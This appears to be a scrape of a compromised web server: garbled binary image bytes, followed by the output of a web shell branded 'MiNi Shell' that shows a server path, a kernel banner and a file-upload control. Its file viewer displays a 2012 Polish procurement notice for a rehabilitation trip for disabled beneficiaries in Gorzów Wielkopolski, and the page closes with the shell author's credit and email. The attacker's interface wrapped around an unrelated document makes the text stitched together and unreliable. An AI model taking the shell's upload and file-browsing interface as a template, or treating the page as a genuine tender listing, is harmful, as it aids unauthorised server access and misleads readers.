JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120626/220654-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: Warsztaty aktywizacji zdrowotnej - organizacja wyjazdu zdrowotnego z elementami rehabilitacji, przy wykorzystaniu instrumentów aktywnej integracji dla Beneficjentów Ostatecznych projektu Nowe umiejętności-Nowe możliwości</b><br>
<b>Numer ogłoszenia: 220654 - 2012; data zamieszczenia: 26.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Gorzowie Wlkp. , ul. Józefa Pankiewicza 5-7, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 0-95 7330-458, faks 0-95 7330-459.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatgorzowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Warsztaty aktywizacji zdrowotnej - organizacja wyjazdu zdrowotnego z elementami rehabilitacji, przy wykorzystaniu instrumentów aktywnej integracji dla Beneficjentów Ostatecznych projektu Nowe umiejętności-Nowe możliwości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie wyjazdu zdrowotnego z elementami rehabilitacji dla dwóch grup łącznie (49 osób) tj.: 
Grupa I - 31 osób niepełnosprawnych + 2 opiekunów 
Grupa II - 8 osób niepełnosprawnych + 8 osób stanowiących otoczenie Beneficjentów Ostatecznych. 
Przedsięwzięcie jest realizowane w ramach projektu  PROGRAM OPERACYJNY KAPITAŁ LUDZKI  Priorytet VII. Promocja integracji społecznej; Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji; Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie; Tytuł: Nowe umiejętności - nowe możliwości 

Podstawowe informacje o uczestnikach:
Grupa I) Beneficjenci Ostateczni Projektu - 31 osób niepełnosprawnych + 2 opiekunów 
Grupa II) Beneficjenci Ostateczni Projektu - 8 osób niepełnosprawnych + 8 osób stanowiących otoczenie Beneficjentów Ostatecznych

Wymagania minimalne dotyczące czasu trwania:
Wyjazd zdrowotny z elementami rehabilitacji dla obu grup musi trwać pięć (5) dni.

Wymagania minimalne dotyczące wyżywienia uczestników:
Grupa I, Grupa II
Wykonawca musi zapewnić dla wszystkich uczestników całodzienne wyżywienie - minimum 3 posiłki dziennie, w tym śniadanie, dwudaniowy ciepły obiad i kolację. Bez ograniczeń musi być zapewniony dostęp do kawy, herbaty oraz napojów zimnych.

Transport uczestników:
Grupa I i Grupa II
Wykonawca musi zapewnić uczestnikom przewóz klimatyzowanym(i) autokarem(ami) z Gorzowa Wlkp. spod siedziby Zamawiającego, do ośrodka i z powrotem (do Gorzowa Wlkp. pod siedzibę Zamawiającego). Ponadto zapewni autokar(autokary) do przewozu uczestników w trakcie oferty turystycznej. Z uwagi na liczbę uczestników dowóz może odbywać się dwoma autokarami, jednak odjazd i przyjazd musi mieć miejsce w tym samym czasie i z tego samego miejsca. Wyjazd z Gorzowa Wlkp. musi mieć miejsce w godzinach porannych, powrót do Gorzowa Wlkp. w godzinach popołudniowych (między 1500 a 1900). 

Minimalny zakres przedmiotowy:
Grupa I i Grupa II
Wykonawca zapewni na swój koszt, dla każdego uczestnika badania lekarskie na początku i na końcu pobytu, a w trakcie całego pobytu stałą opiekę pielęgniarską a także umożliwi korzystanie z opieki lekarskiej (§12 ust. 1 pkt. 4 Rozporządzenia Ministra Gospodarki Pracy i Polityki Społecznej z dnia 22.05.2003). Każdy z uczestników (w tym otoczenie oraz opiekunowie, łącznie 49 osób) musi mieć zapewnione co najmniej 3 indywidualne zajęcia rehabilitacyjne dziennie zgodnie z zaleceniami lekarskimi przez pięć dni pobytu (łącznie 15 zabiegów indywidualnych dla jednego uczestnika w ciągu wyjazdu). Wykonawca zapewni dla wszystkich uczestników ofertę turystyczną poza miejscem zakwaterowania, w granicach Rzeczpospolitej Polskiej, przez co najmniej dwa dni w trakcie pobytu wraz z opieką przewodnika turystycznego (koszty związane z realizacją oferty turystycznej np. przejazd, bilety wstępu obciążają Wykonawcę, a miejsca do których zostaną dowiezieni uczestnicy wyjazdu muszą być dostosowane do potrzeb osób niepełnosprawnych, w tym osób poruszających się na wózkach inwalidzkich). Oferta turystyczna nie może mieć miejsca w czasie podróży z Gorzowa Wlkp. na miejsce realizacji zamówienia oraz w drodze powrotnej. Wykonawca pokrywa także koszty związane z zapłatą tzw. opłaty klimatycznej. Zajęcia rehabilitacyjne i oferta turystyczna nie mogą odbywać się w tym samym czasie.

Wymagania dotyczące ubezpieczenia:
Grupa I i Grupa II
Wszyscy uczestnicy wyjazdu muszą być objęci ubezpieczeniem grupowym NNW dostosowanym do specyfiki zaproponowanego przez Wykonawcę sposobu i miejsca realizacji zamówienia. Koszty ubezpieczenia musi zapewnić i pokryć Wykonawca.

Wymagania dotyczące budynków, w których realizowany będzie przedmiot zamówienia: 
Grupa I i Grupa II
Ośrodek rehabilitacyjny musi posiadać wpis do rejestru ośrodków, w których mogą odbywać się turnusy dla osób niepełnosprawnych zgodnie z Rozporządzeniem Ministra Gospodarki Pracy i Polityki Społecznej z dnia 22.05.2003 w sprawie turnusów rehabilitacyjnych Dz. U. z 2003 Nr 100, poz. 926 ze zm. Ośrodek musi znajdować się nie dalej niż 0,5 kilometra od morza, w województwie zachodniopomorskim, lecz nie dalej niż ok. 300 km od miasta Gorzowa Wlkp.
Każdy pokój musi mieć węzeł sanitarny (łazienka wyposażona w ciepłą wodę, wannę lub natrysk, wc), oddzielne łóżka, szafę na odzież. Budynek musi być dostosowany do potrzeb osób niepełnosprawnych w tym osób poruszających się na wózkach inwalidzkich. Pokoje muszą znajdować się w miejscu dostępnym dla osób niepełnosprawnych ruchowo (w tym osób poruszających się na wózkach inwalidzkich) i być dostosowane do ich potrzeb. W tym samym budynku musi znajdować się jadalnia lub stołówka (przygotowana do spożywania posiłków, wyposażona w stoły i krzesła) oraz oddzielnie kuchnia.
Wszyscy uczestnicy muszą być zakwaterowani w pokojach jedno lub dwu osobowych, znajdujących się w jednym budynku. 
Grupa I 
- Zakwaterowanie w pokojach musi uwzględniać następujący podział, na podgrupy oraz płeć osób biorących udział, 31 osób niepełnosprawnych zakwaterowanych w pokojach jedno lub dwu osobowych
- 2 opiekunów w pokojach jednoosobowych
Grupa II
Wszyscy uczestnicy (16 osób) powinni być zakwaterowani w pokojach 2 osobowych, znajdujących się w jednym budynku. Każdy Beneficjent Ostateczny (8 osób) będzie znajdował się w pokoju ze swoim otoczeniem (8 osób). 

Pozostałe zobowiązania i postanowienia:
1) Wykonawca zobowiązany jest do prowadzenia działań informacyjnych i promocyjnych kierowanych do uczestników poprzez umieszczenie obowiązujących logotypów na wszystkich dokumentach dotyczących projektu systemowego, w tym materiałach informacyjnych dotyczących usługi oraz informowania uczestników o współfinansowaniu projektu systemowego ze środków Unii Europejskiej ramach Europejskiego Funduszu Społecznego. Należy to zrobić stosując odpowiednie logotypy oraz informację: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający udostępni Wykonawcy wzory obowiązujących logotypów, a Wykonawca we własnym zakresie zapewni wydruk w/w oznaczeń, 
2) Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu konsultacji lekarskich oraz odbytych zajęć rehabilitacyjnych stanowiącej dziennik zajęć zawierający listę obecności, wymiar godzin, 
3) Wykonawca zobowiązany jest do przechowywania dokumentacji związanej z realizacją projektu systemowego do dnia 31.12.2020 r. w sposób zapewniający dostępność, poufność, bezpieczeństwo oraz do informowania Zamawiającego o miejscu archiwizacji dokumentów związanych z realizacją niniejszego zamówienia. W przypadku zmiany adresu archiwizacji dokumentów, zawieszenia lub zaprzestania przez Wykonawcę działalności przed terminem 31.12.2020 r. Wykonawca powiadomi Zamawiającego o tym na piśmie. Wykonawca zobligowany jest przekazać oryginały dokumentacji z zajęć Zamawiającemu.
4) Wykonawca zobowiązany jest do niezwłocznego informowania w formie telefonicznej oraz jednocześnie pisemnej Zamawiającego o problemach w realizacji usługi będącej przedmiotem zamówienia,
5)Wykonawca zobligowany jest do zarejestrowania się, najpóźniej w dniu wyjazdu, w internetowej bazie ofert szkoleniowych www.inwestycjawkadry.pl i aktualizacji informacji o każdym etapie organizowanych zajęć w ramach Projektu systemowego nie rzadziej niż raz w miesiącu, zgodnie z zakresem danych określonym przez Instytucję Pośredniczącą. Wydruk z rejestracji na w/w stronie Wykonawca zobligowany jest przedstawić Zamawiającemu najpóźniej w dniu podpisania umowy.
6) Wykonawca zobowiązany jest do poddania się kontroli dokonywanej przez Zamawiającego oraz inne uprawnione podmioty w zakresie prawidłowości realizacji usługi będącej przedmiotem zamówienia. Kontrola może zostać przeprowadzona zarówno w siedzibie Wykonawcy, jak i w miejscu realizacji usługi będącej przedmiotem zamówienia,
7) Wykonawca zobowiązany jest do zapewnienia kontrolującym prawo wglądu we wszystkie dokumenty związane z realizacją Projektu systemowego, przez cały okres ich przechowywania, 
8) Udzielanie na pisemne wezwanie Zamawiającego wszelkich informacji i wyjaśnień związanych z realizacją zamówienia, w terminie określonym w wezwaniu przez cały okres realizacji zamówienia oraz okres, o którym mowa w pkt.3, 
9) Zamawiający ma prawo przeprowadzania czynności monitorujących podczas trwania usługi, w szczególności do przeprowadzania ankiet, rozmów, konsultacji z uczestnikami,  
10) Na podstawie art. 31 ust. 1 ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926, ze zm.), Zamawiający zleca Wykonawcy przetwarzanie danych osobowych w zakresie określonym przez Zamawiającego, 
11) Celem przetwarzania danych osobowych jest umożliwienie monitoringu, kontroli i ewaluacji Projektu systemowego, 
12) W zakresie, o którym mowa w pkt. 9 Wykonawca zobowiązuje się do współpracy z ewaluatorami zewnętrznymi, prowadzącymi badania na zlecenie Zamawiającego lub przez inne podmioty posiadające uprawnienia do przeprowadzenia tego typu badań,  
13) Ze strony Wykonawcy do przetwarzania danych dopuszczone mogą być jedynie osoby które uzyskały imienne upoważnienie zgodnie z art. 37 ustawy o ochronie danych osobowych, o której mowa pkt. 10, po podpisaniu oświadczenia o zachowaniu w tajemnicy danych osobowych, do których osoby te uzyskają dostęp w związku z wykonywaniem umowy. Imienne upoważnienia, o których mowa powyżej wydane będą przez Wykonawcę,
14) Wykonawca wyraża zgodę na upublicznienie swoich danych teleadresowych przez Zamawiającego oraz inne uprawnione do tego podmioty,
15) Wykonawca zobowiązany jest do stosowania aktualnych wytycznych w zakresie zasad przygotowania, realizacji rozliczania projektów systemowych powiatowych centrów pomocy rodzinie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany Formularz Oferty, stanowiący załącznik nr 1 do SIWZ, 
2) haromonogram oferty turystycznej sporządzony według załącznika nr 4 do
SIWZ, 
3) Jeżeli Wykonawca, wykazując spełnianie warunków o których mowa w art. 22 ust. 1 PZP polega na zasobach innych podmiotów, na zasadach
określonych w art. 26 ust. 2b ustawy PZP, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres
korzystania z nich przy wykonywaniu zamówienia, sporządzone według załącznika nr 3a do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatgorzowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie ul. Józefa Pankiewicza 5-7, 66-400
Gorzów Wlkp. woj. lubuskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2012 godzina 12:30, miejsce: Powiatowe Centrum Pomocy Rodzinie ul. Józefa Pankiewicza 5-7, 66-400 Gorzów Wlkp. woj. lubuskie - sekretariat pok. 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą Nowe umiejętności - nowe możliwości, w ramach którego realizowane jest zadanie Aktywna integracja współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com